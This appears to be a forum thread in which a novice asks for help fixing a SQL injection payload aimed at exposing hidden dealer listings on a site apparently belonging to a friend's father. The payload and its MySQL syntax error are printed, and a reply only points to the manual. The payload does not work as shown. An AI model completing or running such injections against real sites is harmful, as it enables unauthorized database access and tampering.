Don't bother reading. Shouldn't have even asked.
I'm new to MySQL. I'm pen-testing a site for a friend, and I just can't get the syntax right to view these listings that are supposed to be hidden. Anyone want to help? I've got:
WHERE dealer.display='on' AND hide != 'true'
AND dealer.id=listing.dealer_id
AND listing.make='/*begin injection*/'Acura'
AND TRUE=(INSERT INTO (listing,dealer) VALUES('v4LT0S34rChF0r'))
OR 'g'='r /*end injection*/ '
AND listing.model='anythinghere'
Okay, fine. The father of one of my friends. But w/e. I already showed him an XSS-able input form… I'm totally serious. Don't believe me if you don't want to, but help with the syntax please?
Also, updated code I'm trying.
Here's the output.
A Database Error Occurred
Error Number: 1064
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near markup 'INTO (listing,dealer) VALUES('v4LT0S34rChF0r')) OR 'g'='r' AND listing.year >='1' at line 3
SELECT listing.id, dealer.display FROM (listing,dealer) WHERE dealer.display='on' AND hide != 'true' AND dealer.id=listing.dealer_id AND listing.make='Acura' AND TRUE=(INSERT INTO (listing,dealer) VALUES('v4LT0S34rChF0r')) OR 'g'='r' AND listing.year >='1901' AND listing.mileage >=0
You could do what the error message suggests and read the MySQL manual. It even shows you where in the query the syntax error occurs, which you can use to figure out which statement to look up.
outis wrote: You could do what the error message suggests and read the MySQL manual. It even shows you where in the query the syntax error occurs, which you can use to figure out which statement to look up.
Yeah… I'm sorry for even posting this now. I'm going to bookmark that, and do all those steps before asking. Lesson learned! Thanks for your time!